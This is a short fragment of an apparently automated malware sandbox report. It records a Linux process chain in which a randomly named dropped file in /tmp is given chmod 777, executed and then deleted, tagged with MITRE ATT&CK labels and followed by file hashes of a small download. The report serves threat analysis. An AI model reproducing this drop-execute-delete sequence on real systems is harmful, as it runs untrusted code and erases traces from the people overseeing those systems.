/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:952
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97